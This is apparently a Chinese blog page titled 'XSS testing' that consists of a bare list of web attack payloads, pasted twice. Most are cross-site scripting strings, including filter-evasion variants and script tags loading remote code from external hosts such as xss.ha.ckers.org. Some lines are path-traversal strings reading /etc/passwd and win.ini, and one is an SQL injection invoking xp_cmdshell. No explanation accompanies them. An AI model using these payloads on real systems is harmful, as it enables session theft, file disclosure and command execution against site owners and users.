XSS 测试

IMG_3081

<svg onload=alert(1)></svg>

<script>alert(document.cookie)</script>

'><script>alert(document.cookie)</script>

='><script>alert(document.cookie)</script>

<script>alert(vulnerable)</script>

%3Cscript%3Ealert('XSS')%3C/script%3E

<script>alert('XSS')</script>

<img src="javascript:alert('XSS')"></img>

%0a%0a<script>alert(\"Vulnerable\")</script>.jsp

%22%3cscript%3ealert(%22xss%22)%3c/script%3e

%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini

%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html

<script>alert('Vulnerable');</script>

<script>alert('Vulnerable')</script>

a.jsp/<script>alert('Vulnerable')</script>

a?<script>alert('Vulnerable')</script>

"><script>alert('Vulnerable')</script>

';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&

%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

%3Cscript%3Ealert(document. domain);%3C/script%3E&

%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=

<IMG src="javascript:alert('XSS');"></IMG>

<IMG src=javascript:alert('XSS')></IMG>

<IMG src=JaVaScRiPt:alert('XSS')></IMG>

<IMG src=JaVaScRiPt:alert("XSS")></IMG>

<IMG src=javascript:alert('XSS')></IMG>

<IMG src=javascript:alert('XSS')></IMG>

<IMG src=javascript:alert('XSS')></IMG>

<IMG src="jav ascript:alert('XSS');"></IMG>

<IMG src="jav ascript:alert('XSS');"></IMG>

<IMG src="jav ascript:alert('XSS');"></IMG>

"<IMG src=java\0script:alert(\"XSS\")>";' > out

<IMG src=" javascript:alert('XSS');"></IMG>

<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

<BODY BACKGROUND="javascript:alert('XSS')"></BODY>

<BODY ONLOAD=alert('XSS')></BODY>

<IMG DYNSRC="javascript:alert('XSS')"></IMG>

<IMG LOWSRC="javascript:alert('XSS')"></IMG>

<BGSOUND src="javascript:alert('XSS');"></BGSOUND>

<br size="&{alert('XSS')}">

<LAYER src="http://xss.ha.ckers.org/a.js"></layer>

<LINK REL="stylesheet" href="javascript:alert('XSS');">

<IMG src='vbscript:msgbox("XSS")'>

<IMG src="mocha:[code]">

<IMG src="livescript:[code]">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<IFRAME src=javascript:alert('XSS')></IFRAME>

<FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">

<DIV STYLE="width: expression(alert('XSS'));">

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS"))'>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<BASE href="javascript:alert('XSS');//">

getURL("javascript:alert('XSS')")

a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);

<XML src="javascript:alert('XSS');">

"> <BODY><SCRIPT>function a(){alert('XSS');}</SCRIPT><"

<SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>

<IMG src="javascript:alert('XSS')"

<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo
'=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->

<IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">

<SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<A href=http://www.gohttp://www.google.com/ogle.com/>link</A>

<IMG SRC=javascript:alert(‘XSS’)>

<IMG SRC=# onmouseover=”alert(‘xxs’)”>

<IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,83))”></img>

<img src=x onerror=”&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041″>

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;

&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC=”jav ascript:alert(‘XSS’);”>

<IMG SRC=”jav&#x0A;ascript:alert(‘XSS’);”>

<IMG SRC=” &#14; javascript:alert(‘XSS’);”>

<<SCRIPT>alert(“XSS”);//<</SCRIPT>

<IMG SRC=”javascript:alert(‘XSS’)”

</script><script>alert(‘XSS’);</script>

<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>

<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

<svg/onload=alert('XSS')>

<IMG SRC=’vbscript:msgbox(“XSS”)’>

<BGSOUND SRC="javascript:alert('XSS');">

<BR SIZE="&{alert('XSS')}">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<XSS STYLE="behavior: url(xss.htc);">

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="width: expression(alert('XSS'));">

<SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>

<script>alert(/xss/)</script>

<svg onload=alert(document.domain)>

<img src=document.domain onerror=alert(document.domain)>

<M onmouseover=alert(document.domain)>M

<marquee onscroll=alert(document.domain)>

<a href=javascript:alert(document.domain)>M</a>

<body onload=alert(document.domain)>

<details open ontoggle=alert(document.domain)>

<embed src=javascript:alert(document.domain)>

<script>alert(1)</script>

<sCrIpT>alert(1)</sCrIpT>

<ScRiPt>alert(1)</ScRiPt>

<sCrIpT>alert(1)</ScRiPt>

<ScRiPt>alert(1)</sCrIpT>

<img src=1 onerror=alert(1)>

<iMg src=1 oNeRrOr=alert(1)>

<ImG src=1 OnErRoR=alert(1)>

<img src=1 onerror="alert(&quot;M&quot;)">

<marquee onscroll=alert(1)>

<mArQuEe OnScRoLl=alert(1)>

<MaRqUeE oNsCrOlL=alert(1)>

<a href=javascript:/0/,alert(%22M%22)>M</a>

<a href=javascript:/00/,alert(%22M%22)>M</a>

<a href=javascript:/000/,alert(%22M%22)>M</a>

<a href=javascript:/M/,alert(%22M%22)>M</a>

<base href=javascript:/M/><a href=,alert(1)>M</a>

<base href=javascript:/M/><iframe src=,alert(1)></iframe>

</textarea><script>var a=1//@ sourceMappingURL=//xss.site</script>

"><img src=x onerror=alert(document.cookie)>.gif

<div style="background-image:url(javascript:alert(/xss/))">

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<iframe src=javascript:alert(1)></iframe>

<iframe src="data:text/html,<iframe src=javascript:alert('M')></iframe>"></iframe>

<iframe src=data:text/html;base64,PGlmcmFtZSBzcmM9amF2YXNjcmlwdDphbGVydCgiTWFubml4Iik+PC9pZnJhbWU+></iframe>

<iframe srcdoc=<svg/o&#x6E;load&equals;alert&lpar;1)&gt;></iframe>

<iframe src=https://baidu.com width=1366 height=768></iframe>

<iframe src=javascript:alert(1) width=1366 height=768></iframe

<form action=javascript:alert(1)><input type=submit>

<form><button formaction=javascript:alert(1)>M

<form><input formaction=javascript:alert(1) type=submit value=M>

<form><input formaction=javascript:alert(1) type=image value=M>

<form><input formaction=javascript:alert(1) type=image src=1>

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<ScRiPt >prompt(915149)</ScRiPt>

<svg/onload=alert(1)>

<script>alert(document.cookie)</script>

'><script>alert(document.cookie)</script>

='><script>alert(document.cookie)</script>

<script>alert(vulnerable)</script>

%3Cscript%3Ealert('XSS')%3C/script%3E

<script>alert('XSS')</script>

<img src="javascript:alert('XSS')">

%0a%0a<script>alert(\"Vulnerable\")</script>.jsp

%22%3cscript%3ealert(%22xss%22)%3c/script%3e

%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini

%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html

<script>alert('Vulnerable');</script>

<script>alert('Vulnerable')</script>

a.jsp/<script>alert('Vulnerable')</script>

a?<script>alert('Vulnerable')</script>

"><script>alert('Vulnerable')</script>

';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&

%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

%3Cscript%3Ealert(document. domain);%3C/script%3E&

%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=

<IMG src="javascript:alert('XSS');">

<IMG src=javascript:alert('XSS')>

<IMG src=JaVaScRiPt:alert('XSS')>

<IMG src=JaVaScRiPt:alert("XSS")>

<IMG src=javascript:alert('XSS')>

<IMG src=javascript:alert('XSS')>

<IMG src=javascript:alert('XSS')>

<IMG src="jav ascript:alert('XSS');">

<IMG src="jav ascript:alert('XSS');">

<IMG src="jav ascript:alert('XSS');">

"<IMG src=java\0script:alert(\"XSS\")>";' > out

<IMG src=" javascript:alert('XSS');">

<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

<BODY BACKGROUND="javascript:alert('XSS')">

<BODY ONLOAD=alert('XSS')>

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<BGSOUND src="javascript:alert('XSS');">

<br size="&{alert('XSS')}">

<LAYER src="http://xss.ha.ckers.org/a.js"></layer>

<LINK REL="stylesheet" href="javascript:alert('XSS');">

<IMG src='vbscript:msgbox("XSS")'>

<IMG src="mocha:[code]">

<IMG src="livescript:[code]">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<IFRAME src=javascript:alert('XSS')></IFRAME>

<FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">

<DIV STYLE="width: expression(alert('XSS'));">

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS"))'>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<BASE href="javascript:alert('XSS');//">

getURL("javascript:alert('XSS')")

a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);

<XML src="javascript:alert('XSS');">

"> <BODY><SCRIPT>function a(){alert('XSS');}</SCRIPT><"

<SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>

<IMG src="javascript:alert('XSS')"

<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo
'=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->

<IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">

<SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>

<A href=http://www.gohttp://www.google.com/ogle.com/>link</A>

<IMG SRC=javascript:alert(‘XSS’)>

<IMG SRC=# onmouseover=”alert(‘xxs’)”>

<IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,83))”></img>

<img src=x onerror=”&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041″>

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;

&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC=”jav ascript:alert(‘XSS’);”>

<IMG SRC=”jav&#x0A;ascript:alert(‘XSS’);”>

<IMG SRC=” &#14; javascript:alert(‘XSS’);”>

<<SCRIPT>alert(“XSS”);//<</SCRIPT>

<IMG SRC=”javascript:alert(‘XSS’)”

</script><script>alert(‘XSS’);</script>

<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>

<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

<svg/onload=alert('XSS')>

<IMG SRC=’vbscript:msgbox(“XSS”)’>

<BGSOUND SRC="javascript:alert('XSS');">

<BR SIZE="&{alert('XSS')}">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<XSS STYLE="behavior: url(xss.htc);">

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="width: expression(alert('XSS'));">

<SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>

<script>alert(/xss/)</script>

<svg onload=alert(document.domain)>

<img src=document.domain onerror=alert(document.domain)>

<M onmouseover=alert(document.domain)>M

<marquee onscroll=alert(document.domain)>

<a href=javascript:alert(document.domain)>M</a>

<body onload=alert(document.domain)>

<details open ontoggle=alert(document.domain)>

<embed src=javascript:alert(document.domain)>

<script>alert(1)</script>

<sCrIpT>alert(1)</sCrIpT>

<ScRiPt>alert(1)</ScRiPt>

<sCrIpT>alert(1)</ScRiPt>

<ScRiPt>alert(1)</sCrIpT>

<img src=1 onerror=alert(1)>

<iMg src=1 oNeRrOr=alert(1)>

<ImG src=1 OnErRoR=alert(1)>

<img src=1 onerror="alert(&quot;M&quot;)">

<marquee onscroll=alert(1)>

<mArQuEe OnScRoLl=alert(1)>

<MaRqUeE oNsCrOlL=alert(1)>

<a href=javascript:/0/,alert(%22M%22)>M</a>

<a href=javascript:/00/,alert(%22M%22)>M</a>

<a href=javascript:/000/,alert(%22M%22)>M</a>

<a href=javascript:/M/,alert(%22M%22)>M</a>

<base href=javascript:/M/><a href=,alert(1)>M</a>

<base href=javascript:/M/><iframe src=,alert(1)></iframe>

</textarea><script>var a=1//@ sourceMappingURL=//xss.site</script>

"><img src=x onerror=alert(document.cookie)>.gif

<div style="background-image:url(javascript:alert(/xss/))">

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<iframe src=javascript:alert(1)></iframe>

<iframe src="data:text/html,<iframe src=javascript:alert('M')></iframe>"></iframe>

<iframe src=data:text/html;base64,PGlmcmFtZSBzcmM9amF2YXNjcmlwdDphbGVydCgiTWFubml4Iik+PC9pZnJhbWU+></iframe>

<iframe srcdoc=<svg/o&#x6E;load&equals;alert&lpar;1)&gt;></iframe>

<iframe src=https://baidu.com width=1366 height=768></iframe>

<iframe src=javascript:alert(1) width=1366 height=768></iframe

<form action=javascript:alert(1)><input type=submit>

<form><button formaction=javascript:alert(1)>M

<form><input formaction=javascript:alert(1) type=submit value=M>

<form><input formaction=javascript:alert(1) type=image value=M>

<form><input formaction=javascript:alert(1) type=image src=1>

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
Related posts
Organize, collaborate &
achieve your goals
Receive weekly updates on new posts and features. Receive weekly updates on new posts and features.Receive weekly updates on new posts and features. Receive weekly updates on new posts and features.
Start free trial
front-arrow